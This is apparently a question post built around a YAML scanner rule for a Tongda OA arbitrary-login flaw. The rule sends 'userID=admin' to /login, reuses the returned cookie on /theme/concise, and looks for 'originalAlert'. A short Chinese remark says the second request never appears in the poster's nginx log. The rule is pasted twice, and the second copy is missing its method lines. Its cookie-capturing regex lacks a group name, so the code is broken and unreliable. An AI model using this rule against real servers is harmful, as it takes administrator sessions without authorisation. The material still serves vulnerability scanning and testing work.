name: 通达OA任意登录
manual: true
sets:
rules:
- method: POST
path: /login
headers:
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
body: "userID=admin"
follow_redirects: false
continue: true
search: |
Set-Cookie:(?P.*?)
- method: GET
path: /theme/concise
continue: true
headers:
Cookie: "{{cookie}}"
expression: |
response.body.bcontains(b"originalAlert")
规则二我看本地的nginx日志没有发送/theme/concise这个地址
name: 通达OA任意登录
manual: true
sets:
rules:
path: /login
headers:
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
body: "userID=admin"
follow_redirects: false
continue: true
search: |
Set-Cookie:(?P.*?)
path: /theme/concise
continue: true
headers:
Cookie: "{{cookie}}"
expression: |
response.body.bcontains(b"originalAlert")
规则二我看本地的nginx日志没有发送/theme/concise这个地址